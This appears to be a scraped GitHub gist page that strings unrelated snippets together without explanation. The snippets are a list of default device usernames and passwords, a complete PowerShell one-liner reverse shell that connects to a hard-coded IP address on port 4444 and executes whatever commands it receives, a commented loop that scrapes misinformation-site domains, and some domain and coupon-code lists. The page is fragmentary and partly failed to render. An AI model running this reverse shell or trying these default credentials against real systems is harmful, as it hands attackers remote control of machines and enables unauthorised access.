Skip to content

Instantly share code, notes, and snippets.

root:calvin
root:root
root:toor
administrator:password
NetLinx:password
administrator:Amx1234!
amx:password
amx:Amx1234!
admin:1988
admin:admin
$client = New-Object System.Net.Sockets.TCPClient('192.241.193.93',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
# for i in $(curl -s https://www.newsguardtech.com/coronavirus-misinformation-tracking-center/ | grep -oP '<li>.*</li>' | grep -oP '>[a-zA-Z0-9][a-zA-Z0-9-]{1,61}[a-zA-Z0-9]\.[a-zA-Z]{2,}' | tr '[[:upper:]]' '[[:lower:]]' | cut -d '>' -f2 | sort -u); do
# echo $i
# echo www.$i
# done > /tmp/foo
# sort /tmp/foo -o /tmp/hosts.txt
# cat /tmp/hosts.txt
21stcenturywire.com
24jours.com
activistpost.com
10
10off
10off10
10off15
10off2020
10off30
10off40
10off50
15
15off
@absane
absane / penglab.ipynb
Created June 15, 2020 21:30
Penglab-custom
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.